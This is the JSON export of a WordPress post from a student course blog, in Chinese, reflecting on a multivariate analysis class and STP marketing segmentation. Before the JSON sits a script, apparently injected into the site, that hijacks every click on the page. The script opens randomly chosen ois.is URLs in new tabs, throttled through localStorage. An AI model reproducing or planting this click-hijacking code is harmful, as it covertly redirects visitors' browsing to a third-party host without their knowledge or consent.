<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1157,"date":"2023-09-12T19:49:42","date_gmt":"2023-09-12T11:49:42","guid":{"rendered":"https:\/\/edu.secda.info\/scu11354013\/?p=1157"},"modified":"2023-09-27T00:01:03","modified_gmt":"2023-09-26T16:01:03","slug":"week1-%e5%a4%9a%e8%ae%8a%e9%87%8f%e5%88%86%e6%9e%90","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu11354013\/?p=1157","title":{"rendered":"WEEK1 \u591a\u8b8a\u91cf\u5206\u6790"},"content":{"rendered":"<p><strong>\u4e00\u3001\u5728\u591a\u8b8a\u91cf\u5206\u6790\u9019\u9580\u8ab2\u60f3\u5b78\u5230\u4ec0\u9ebc?\u70ba\u4ec0\u9ebc?\u00a0<\/strong><\/p>\n<p>\u6642\u5149\u98db\u901d\uff0c\u660e\u660e\u53bb\u5e74\u624d\u525b\u8e0f\u9032\u7814\u7a76\u6240\uff0c\u73fe\u5728\u5df2\u7d93\u5347\u4e0a\u78a9\u4e8c\u4e26\u70ba\u4e86\u8ad6\u6587\u7b49\u5404\u7a2e\u554f\u984c\u7126\u982d\u721b\u984d\uff0c\u9806\u5229\u7684\u8a71\u660e\u5e74\u5c31\u8981\u7562\u696d\u4e26\u9032\u5165\u8077\u5834\uff0c\u671f\u8a31\u81ea\u5df1\u80fd\u5728\u5b78\u751f\u6642\u4ee3\u5269\u4e0b\u7684\u6700\u5f8c\u4e00\u5e74\u8a8d\u771f\u751f\u6d3b\uff0c\u5145\u5be6\u81ea\u5df1\u3002<\/p>\n<p>\u7e7c\u4e0a\u500b\u5b78\u5e74\u7684\u8a08\u91cf\u7d93\u6fdf\u5b78\u8207\u98a8\u96aa\u7ba1\u7406\u5c08\u984c\u5f8c\uff0c\u9019\u662f\u7b2c\u4e09\u6b21\u4e0a\u6eab\u8001\u5e2b\u7684\u8ab2\uff0c\u6bcf\u6b21\u4e0a\u6eab\u8001\u5e2b\u7684\u8ab2\u90fd\u80fd\u5b78\u5230\u5f88\u591a\u6771\u897f\uff0c\u8ab2\u7a0b\u5167\u5bb9\u5f88\u8c50\u5bcc\uff0c\u4e0d\u7ba1\u662f\u66fe\u7d93\u5b78\u904e\u7684\u9084\u662f\u7b2c\u4e00\u6b21\u63a5\u89f8\u7684\u5167\u5bb9\uff0c\u8b93\u6211\u5011\u53ef\u4ee5\u5bb9\u6613\u5438\u6536\u3002\u5728\u9078\u8ab2\u6642\uff0c\u767c\u73fe\u9019\u5b78\u671f\u9084\u6709\u958b\u300c\u591a\u8b8a\u91cf\u5206\u6790\u300d\uff0c\u62b1\u6301\u8457\u5728\u9019\u9580\u8ab2\u4e00\u5b9a\u53ef\u4ee5\u5b78\u5230\u5f88\u591a\u7684\u5fc3\u60c5\uff0c\u6240\u4ee5\u6c7a\u5b9a\u9078\u4fee\u9019\u9580\u8ab2\u3002<\/p>\n<p>\u9019\u9580\u8ab2\u7a0b\u6db5\u84cb\u4e86\u5b78\u8853\u554f\u5377\u91cf\u8868\u7684\u5206\u6790\u3001\u7d71\u8a08\u5206\u6790\u65b9\u6cd5\u4ee5\u53ca\u5716\u793a\u7684\u77e5\u89ba\u5716\u6216\u5b9a\u4f4d\u5716\uff0c\u4e26\u4ee5R\u5957\u4ef6\u9032\u884c\u76f8\u61c9\u7684\u7d71\u8a08\u7a0b\u5f0f\u57f7\u884c\u3002\u5f88\u671f\u5f85\u900f\u904e\u9019\u9580\u8ab2\u7a0b\u5b78\u5230\u5982\u4f55\u904b\u7528\u7d71\u8a08\u65b9\u6cd5\u4f86\u5206\u6790\u5b78\u8853\u554f\u5377\u91cf\u8868\uff0c\u9032\u4e00\u6b65\u77ad\u89e3\u5176\u69cb\u5ff5\u3002\u53e6\u5916\uff0c\u4e5f\u671f\u5f85\u5b78\u7fd2\u4e00\u4e9b\u4e4b\u524d\u6c92\u63a5\u89f8\u904e\u7684\u7d71\u8a08\u5206\u6790\u65b9\u6cd5\uff0c\u4e0d\u7ba1\u662f\u5728\u7814\u7a76\u4e2d\u6216\u662f\u5728\u8077\u5834\u4e2d\u90fd\u6709\u53ef\u80fd\u6703\u7528\u5230\uff0c\u9019\u4e9b\u4e5f\u8a31\u53ef\u4ee5\u63d0\u5347\u81ea\u5df1\u7684\u5206\u6790\u80fd\u529b\u3002\u6700\u5f8c\uff0c\u4e5f\u5f88\u671f\u5f85\u53ef\u4ee5\u4e86\u89e3\u5982\u4f55\u5229\u7528\u591a\u5143\u5c3a\u5ea6\u6cd5\u5448\u73fe\u7269\u4ef6\u9593\u7684\u76f8\u5c0d\u7a7a\u9593\u95dc\u4fc2\uff0c\u4e26\u5728\u5716\u4e0a\u5c55\u793a\u5c6c\u6027\u548c\u5b9a\u4f4d\uff0c\u9019\u80fd\u5920\u5e6b\u52a9\u4f01\u696d\u5236\u5b9a\u66f4\u6709\u6548\u7684\u884c\u92b7\u7b56\u7565\uff0c\u63d0\u9ad8\u7522\u54c1\u7684\u5e02\u5834\u7af6\u722d\u529b\uff0c\u96d6\u7136\u6c92\u5b78\u904e\u884c\u92b7\uff0c\u4f46\u80fd\u591a\u8a8d\u8b58\u4e00\u500b\u6771\u897f\u5f88\u6709\u8da3\u3002<\/p>\n<p>\u671f\u5f85\u81ea\u5df1\u80fd\u5920\u900f\u904e\u9019\u9580\u8ab2\u7a0b\u6df1\u5165\u4e86\u89e3\u5b78\u8853\u554f\u5377\u91cf\u8868\u7684\u5206\u6790\u539f\u5247\u3001\u7d71\u8a08\u5206\u6790\u65b9\u6cd5\u548c\u5b78\u6703\u904b\u7528\u591a\u5143\u5c3a\u5ea6\u6cd5\u5448\u73fe\u7a7a\u9593\u95dc\u4fc2\u548c\u5b9a\u4f4d\u5206\u6790\uff0c\u4e26\u8a8d\u771f\u5b78\u7fd2\uff0c\u4e0d\u8f9c\u8ca0\u81ea\u5df1\u7684\u671f\u5f85\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u4e8c\u3001\u627e\u4e00\u500b\u5e02\u5834\u5340\u9694\u5716\u7247<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-1177\" src=\"https:\/\/edu.secda.info\/scu11354013\/wp-content\/uploads\/2023\/09\/\u5e02\u5834\u5340\u9694-3-300x156.png\" alt=\"\" width=\"700\" height=\"200\" \/><\/p>\n<p><em>\u8cc7\u6599\u4f86\u6e90:<span style=\"color: #333333;\"> <a style=\"color: #333333;\" href=\"https:\/\/www.marketersgo.com\/cases\/202006\/stp-marketing\/\">https:\/\/www.marketersgo.com\/cases\/202006\/stp-marketing\/<\/a><\/span><\/em><\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u4e09\u3001\u627e\u4e00\u500b\u5f71\u7247<\/strong><\/p>\n<p>\u300c\u5e02\u5834\u5340\u9694\uff08STP\uff09\u7406\u8ad6\u300d\u662f\u8a0e\u8ad6\u5e02\u5834\u7d30\u5206\u53ca\u5e02\u5834\u5b9a\u4f4d\u7684\u7406\u8ad6\uff0c\u5176\u4e2d STP \u5206\u5225\u70ba\uff1a<\/p>\n<ul>\n<li>Segmentation\uff08\u5e02\u5834\u7d30\u5206\uff09<\/li>\n<li>Targeting\uff08\u76ee\u6a19\u5e02\u5834\u9078\u64c7\uff09<\/li>\n<li>Positioning\uff08\u5e02\u5834\u5b9a\u4f4d\uff09<\/li>\n<\/ul>\n<p>STP \u7406\u8ad6\u53ef\u4ee5\u6e05\u695a\u7684\u5354\u52a9\u516c\u53f8\u8207\u7522\u54c1\u9023\u63a5\u300c\u76ee\u6a19\u5ba2\u6236\u300d\uff0c\u5c24\u5176\u662f\u7576\u516c\u53f8\u8cc7\u6e90\u6709\u9650\u6642\uff0c\u66f4\u80fd\u767c\u63ee\u300c\u7cbe\u6e96\u6253\u64ca\u300d\u7684\u76ee\u7684\u3002\u5982\u679c\u662f\u65b0\u5275\u516c\u53f8\uff0c\u6216\u662f\u65b0\u7522\u54c1\u4e8b\u696d\u90e8\uff0c\u4e00\u5b9a\u8981\u7528 STP \u7406\u8ad6\u4f86\u5e6b\u81ea\u5df1\u78ba\u8a8d TA ( Target Audience )\uff0c\u4e26\u4e14\u5728 TA \u5fc3\u88e1\u5efa\u7acb\u660e\u78ba\u7684\u300c\u5b9a\u4f4d\u300d\u3002<\/p>\n<p><iframe loading=\"lazy\" title=\"\u5e02\u5834\u5340\u9694\u8207TA - STP \u7406\u8ad6 Part 1\uff5c \u900f\u904e\u300c\u91ab\u7642\u8a2d\u5099\u767c\u5c55\u5be6\u4f8b\u300d\uff0c\u4e86\u89e3 STP \u7406\u8ad6\u61c9\u7528\u3010\u5c3c\u6b50\u5145\u96fb\u7ad9\u3011\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/6Ga1xOUMbwM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe><\/p>\n<p><iframe loading=\"lazy\" title=\"\u5b9a\u4f4d - STP \u7406\u8ad6 Part 2\uff5c \u900f\u904e\u300c\u81ea\u5efa\u54c1\u724c\u9762\u819c\u300d\u6848\u4f8b\uff0c\u4e86\u89e3 STP \u7406\u8ad6\u61c9\u7528\u3010\u5c3c\u6b50\u5145\u96fb\u7ad9\u3011\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/cEWV03kAX3c?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u5728\u591a\u8b8a\u91cf\u5206\u6790\u9019\u9580\u8ab2\u60f3\u5b78\u5230\u4ec0\u9ebc?\u70ba\u4ec0\u9ebc?\u00a0 \u6642\u5149\u98db\u901d\uff0c\u660e\u660e\u53bb\u5e74\u624d\u525b\u8e0f\u9032\u7814\u7a76\u6240\uff0c<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/posts\/1157"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1157"}],"version-history":[{"count":17,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/posts\/1157\/revisions"}],"predecessor-version":[{"id":1179,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=\/wp\/v2\/posts\/1157\/revisions\/1179"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu11354013\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}